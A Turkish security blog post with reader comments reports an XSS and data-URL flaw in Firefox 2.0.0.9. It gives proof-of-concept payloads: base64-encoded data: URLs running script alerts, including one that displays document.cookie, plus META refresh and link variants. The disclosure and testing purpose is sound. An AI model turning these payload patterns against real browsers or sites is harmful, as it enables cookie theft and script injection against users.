Ara
Kullanıcı girişi
Gezinti
En son ağ günlüğü gönderileri
- Kevin Mitnick, Efsane Hackerin Öyküsü…
- Msn Virüsünden Kurtulun...
- İşlemci (Merkezi İşlem Birimi - CPU) Nedir, Nasıl Çalışır?
- MSDE 2000 upgrade SQL Server 2005 Express Edition
- IE8 Beta yakında
- Gezici Kullanıcı Profili Nasıl Yapılandırılır?
- Akbank'tan geliyormuş gibi görünen olta epostasına dikkat
- VmWare WorkStation 6.0
- GPO Üzerinden Administrative Template (.adm file) Uygulanması
- Microsoft: Vista XP ve açık kaynak kodlu OSlardan daha güvenli
Son yorumlar
- Windows XP SP3
22 saat 8 min önce - ok, sen visual studio
3 gün 4 saat önce - VLAN Makaleleri Cisco Eğitmeninden
3 gün 22 saat önce - -
3 gün 23 saat önce - sql sorun
4 gün 9 saat önce - Re: Sql server 2005 kurulumu sorunu
6 gün 14 saat önce - sql sorun
1 hafta 10 saat önce - Re: Joomla! ve Mambo SQL Injection açıkları
2 hafta 2 gün önce - vista servis pack 1
2 hafta 4 gün önce - teşekkürler ama....
3 hafta 13 saat önce
En Çok Okunanlar
Kimler yeni
- vantrolog
- osiris
- gnckampus
- açı
- bayram
Bağlantılar
İçerik paylaşımı
Mozilla Firefox’ta Yeni Bir Açık Daha (2.0.0.9)
Gün geçmiyorki yeni açıklar çıkmasın. Bu seferki açıkta Firefox'ta bulundu. 2.0.0.8 versiyonu geçtiğimiz haftalarda çıkmasına rağmen, kısa sürede yeni açıklar tespit edildi. Ayrıca 1 Kasım da çıkan 2.0.0.9 versiyonunda da bu açığın bulunduğu gözlendi. Firefox üzerinde XSS kodlarını rahatça çalıştırabilmek ve data url scheme açığını kullanabilmek mümkün. Bu açığı test edebilmeniz için altta bazı örnek kodlar paylaştım. XSS kodunuzu bu adresten base64 koduna çevirip alttaki gibi adres çubuğunda deneyebilirsiniz Firefox'un yeni sürümü yakın zamanda çıkabilir.
Alttaki kodları Firefox'un adres çubuğuna yapıştırıp deneyebilirsiniz.
CODE:
-
(<script>alert(1);</script> base64'e çevirilmiş hali altta. Adres çubuğuna yapıştırıp deneyebilirsiniz.)
-
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=
-
(<script>alert(document.cookie)</script> base64'e çevirilmiş hali altta. Adres çubuğuna yapıştırıp deneyebilirsiniz.)
-
data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
-
<META http-equiv="refresh" content="5;URL=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=">
-
data:text/html,<script>alert(1)</script>
-
data:text/cmd;,test
Veya alttaki kodları html olarak kaydedip te denemeniz mümkün.
CODE:
-
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=">XSS</a>
-
<META http-equiv="refresh" content="3;URL=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=">
Kaynak: eno7 | http://eno7.org
- Yorum göndermek için giriş yapın veya kayıt olun
Benzer yazılar
Etiketler
En son forum mesajları
- Güvenlik Yardımportlar konusunda cok ACİL yardım lazım LÜTFENhomeros
- Kullanıcısitem neden hackledni ?gnckampus
- Güvenlik YardımSistem Geri Yükleme ve Diğer Windows Servisleri Çalışmıyorendder
- Güvenlik Yardımproxy kullanamıyorum bütün ayarları yapmama rağmenAdRaMiTi
- Güvenlik YardımMedya devi hacker kiraladıazizbilgili
Yaklaşan Aktiviteler
Re: Mozilla Firefox’ta Yeni Bir Açık Daha (2.0.0.9)
Bu açıkların zararları nelerdir peki ? Bundan hiç bahsedilmemiş. Bize karşı bunu nasıl kullanabilirler ?
Re: Mozilla Firefox’ta Yeni Bir Açık Daha (2.0.0.9)
Ya bu kodlar operada da işliyor??
Bunun bize tehlikesi nedir acaba?
Re: Mozilla Firefox’ta Yeni Bir Açık Daha (2.0.0.9)
Şimdi denedim Mac OS X 10.4.8 üzerinde Firefox 2.0.0.9 da etkileniyor.
Re: Mozilla Firefox’ta Yeni Bir Açık Daha (2.0.0.9)
yeni sürüm 1 Kasım da çıkmış az önce test ettim. Malesef yeni sürümde de bu açık hala mevcut başlığı güncelledim.
Re: Mozilla Firefox’ta Yeni Bir Açık Daha (2.0.0.8)
yeni sürümü cıkmıştır